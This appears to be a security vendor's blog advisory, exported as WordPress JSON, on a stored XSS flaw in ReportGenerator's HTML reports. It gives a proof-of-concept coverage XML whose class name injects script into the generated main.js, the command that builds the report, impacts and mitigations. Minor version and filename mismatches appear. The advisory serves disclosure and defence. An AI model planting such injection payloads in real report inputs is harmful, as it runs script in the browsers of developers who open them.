{"id":47071,"date":"2026-05-25T10:43:05","date_gmt":"2026-05-25T05:13:05","guid":{"rendered":"https:\/\/www.getastra.com\/blog\/?p=47071"},"modified":"2026-05-25T10:43:07","modified_gmt":"2026-05-25T05:13:07","slug":"stored-xss-in-html-report-generator","status":"publish","type":"post","link":"https:\/\/www.getastra.com\/blog\/vulnerability\/stored-xss-in-html-report-generator\/","title":{"rendered":"Stored XSS in HTML Report Generator"},"content":{"rendered":"<div class=\"gb-container gb-container-83f53fef\">\n\n<p class=\"wp-block-paragraph\"><strong>Product Name:<\/strong> HTML Report Generator<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Vulnerability:<\/strong> Stored Cross-Site Scripting (XSS)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Vulnerable Version:<\/strong> &lt; 5.5.8<\/p>\n\n<\/div>\n\n\n<p class=\"wp-block-paragraph\">In May 2026, security researchers at Astra identified a stored Cross-Site Scripting (XSS) vulnerability in HTML ReportGenerator, affecting versions up to 5.5.8.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Cross-Site Scripting (XSS) is a common web security vulnerability that allows threat actors to inject malicious scripts into a web application. This type of vulnerability is mostly exploited to perform actions on behalf of the victim or to mine cryptocurrency.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Technical_Breakdown\"><\/span>Technical Breakdown<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The stored XSS vulnerability was discovered during a manual security review of the HTML report-generation functionality. 
This flaw is particularly dangerous in development environments where HTML reports are frequently generated and opened by developers from CI\/CD pipelines, shared folders, or local machines.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">How was it discovered?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Our researcher discovered this vulnerability while examining how user-controlled coverage metadata is processed and embedded into the reports. It was observed that values like class names and assembly names from XML inputs were directly inserted into JavaScript object literals inside the generated main.js file without proper JavaScript\/JSON escaping.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Only backslashes were escaped, while quotation marks and other JavaScript metacharacters remained unsanitized. By crafting a malicious coverage XML file with a specially formatted class name, it is possible to inject arbitrary JavaScript into the generated report.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">How to replicate the vulnerability<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Install a vulnerable version before <strong>5.5.9<\/strong> (e.g., 5.5.8)<\/li>\n\n\n\n<li>Create an <strong>XML file<\/strong> with the code below and name it malicious-coverage.xml<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?>\n&lt;coverage line-rate=\"0\" branch-rate=\"0\" version=\"1.0\">\n  &lt;packages>\n    &lt;package name=\"demo\">\n      &lt;classes>\n        &lt;class\n          name=\"\\&amp;quot;, &amp;quot;x&amp;quot;:(alert('XSS'),true), &amp;quot;z&amp;quot;: &amp;quot;\"\n          filename=\"test.cs\"\n          line-rate=\"0\"\n          branch-rate=\"0\">\n          &lt;methods\/>\n          &lt;lines\/>\n        &lt;\/class>\n      &lt;\/classes>\n    &lt;\/package>\n  &lt;\/packages>\n&lt;\/coverage>\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">3. Generate the report using this command.
<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>dotnet ReportGenerator.dll \\\n-reports:poc.xml \\\n-targetdir:report \\\n-reporttypes:Html<\/code><\/pre>\n\n\n<div class=\"gb-container gb-container-35f61913\">\n\n<p class=\"wp-block-paragraph\">4. Trigger the XSS by opening the report.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Impact_of_Stored_XSS\"><\/span>Impact of Stored XSS<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The stored XSS vulnerability in ReportGenerator (versions <strong>&lt; 5.5.9<\/strong>) is quite severe because the payload is embedded directly into the generated HTML report. Once the report is generated, anyone who opens it in a browser becomes a victim. This can impact developers, CI\/CD environments, shared coverage dashboards, and internally hosted reports.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Defacement:<\/strong> Modify the appearance and content of the page to show fake messages and offensive content.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Data Theft:<\/strong> Attackers can exfiltrate any data visible to the victim. 
This can include API keys, passwords, personal information, and more.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Account Hijacking:<\/strong> Threat actors can steal session cookies and hijack the victim\u2019s account, allowing them to impersonate the victim to perform further malicious actions.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Privilege Escalation:<\/strong> If an administrator views the page, the attacker can gain administrative access and use it to move laterally.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Phishing:<\/strong> Attackers can inject fake login forms or malicious links that look legitimate.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Malware:<\/strong> Once the stored XSS is triggered, threat actors can exploit the browser context to download and run malware (e.g., keyloggers, ransomware).<\/p>\n\n<\/div>\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Current_Status\"><\/span>Current Status<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The vulnerability in the HTML renderer has been addressed in version <strong>5.5.9<\/strong>, where proper sanitization and escaping measures have been implemented. The issue can be tracked under GitHub Advisory <strong>GHSA-mhh3-wmq6-w25q<\/strong>.<\/p>\n\n\n<div class=\"gb-container gb-container-2aa807b7\">\n<div class=\"gb-container gb-container-80479d65\">\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"What_Can_You_Do\"><\/span>What Can You Do?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Users are strongly advised to update ReportGenerator to version 5.5.9 to mitigate this vulnerability. 
If updating is not possible due to compatibility issues, implement the following workarounds:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Sanitize the coverage XML before processing, using a custom script that removes or escapes unsafe characters.<\/li>\n\n\n\n<li>Open reports in a sandboxed browser or with a strict Content Security Policy.<\/li>\n\n\n\n<li>Disable JavaScript when viewing reports.<\/li>\n\n\n\n<li>Run ReportGenerator inside a container without network access.<\/li>\n\n\n\n<li>Block or validate coverage files from untrusted sources (e.g., pull requests).<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Moreover, Astra Security can help you test for this vulnerability during <a href=\"https:\/\/www.getastra.com\/pentesting\/web-app\" target=\"_blank\" data-type=\"link\" data-id=\"https:\/\/www.getastra.com\/pentesting\/web-app\" rel=\"noreferrer noopener\">manual pentesting<\/a>.<\/p>\n\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Product Name: HTML Report Generator Vulnerability: Stored Cross-Site Scripting (XSS) Vulnerable Version: &lt; 5.5.8 In May 2026, security researchers at Astra identified a stored Cross-Site Scripting (XSS) vulnerability in HTML ReportGenerator, affecting versions up to 5.5.8. Cross-Site Scripting (XSS) is a common web security vulnerability that allows threat actors to inject malicious scripts into a web application. 
&#8230; <a title=\"Stored XSS in HTML Report Generator\" class=\"read-more\" href=\"https:\/\/www.getastra.com\/blog\/vulnerability\/stored-xss-in-html-report-generator\/\" aria-label=\"Read more about Stored XSS in HTML Report Generator\">Read more<\/a><\/p>\n","protected":false},"author":138,"featured_media":47077,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[723],"tags":[],"class_list":["post-47071","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/posts\/47071","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/users\/138"}],"replies":[{"embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/comments?post=47071"}],"version-history":[{"count":1,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/posts\/47071\/revisions"}],"predecessor-version":[{"id":47078,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/posts\/47071\/revisions\/47078"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/media\/47077"}],"wp:attachment":[{"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/media?parent=47071"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/categories?post=47071"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/tags?post=47071"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}